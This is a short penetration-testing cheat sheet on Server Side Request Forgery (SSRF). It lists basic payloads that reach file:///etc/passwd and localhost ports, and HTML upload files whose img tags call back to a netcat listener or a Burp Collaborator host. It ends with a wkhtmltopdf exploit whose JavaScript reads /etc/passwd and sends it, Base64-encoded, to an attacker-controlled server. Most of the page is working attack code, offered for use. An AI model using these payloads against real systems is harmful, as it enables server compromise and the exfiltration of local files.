Server Side Request Forgery (SSRF)
Basic SSRF payloads
file:///etc/passwd
http://127.0.0.1
http://127.0.0.1:5000
http://127.0.0.1:1
index.html
index.php
http::////127.0.0.1:1Blind SSRF
HTML File Upload To SSRF
Make a html file with the following code
<!DOCTYPE html>
<html>
<body>
<a>Hello World!</a>
<img src="http://<SERVICE IP>:PORT/x?=viaimgtag">
</body>
</html>upload this file and see if you get a hit on netcat listener
I got a hit on my netcat listener
Using Burp Collaborator
use the below code in html file
<!DOCTYPE html>
<html>
<body>
<a>Hello World!</a>
<img src="http://oldac4hch7f4k2reoc7cyj3y7pdg17pw.oastify.com/x?=viaimgtag">
</body>
</html>wkhtmltopdf Blind SSRF Exploit
By inspecting the request, we notice wkhtmltopdf in the User-Agent. If we browse wkhtmltopdf's downloads webpage, the below statement catches our attention:
Do not use wkhtmltopdf with any untrusted HTML – be sure to sanitize any user-supplied HTML/JS; otherwise, it can lead to the complete takeover of the server it is running on! Please read the project status for the gory details.
we can execute JavaScript in wkhtmltopdf! Let us leverage this functionality to read a local file by creating the following HTML document.
<html>
<body>
<b>Exfiltration via Blind SSRF</b>
<script>
var readfile = new XMLHttpRequest(); // Read the local file
var exfil = new XMLHttpRequest(); // Send the file to our server
readfile.open("GET","file:///etc/passwd", true);
readfile.send();
readfile.onload = function() {
if (readfile.readyState === 4) {
var url = 'http://<SERVICE IP>:<PORT>/?data='+btoa(this.response);
exfil.open("GET", url, true);
exfil.send();
}
}
readfile.onerror = function(){document.write('<a>Oops!</a>');}
</script>
</body>
</html>In this case, we are using two XMLHttpRequest objects, one for reading the local file and another one to send it to our server. Also, we are using the btoa function to send the data encoded in Base64.
Last updated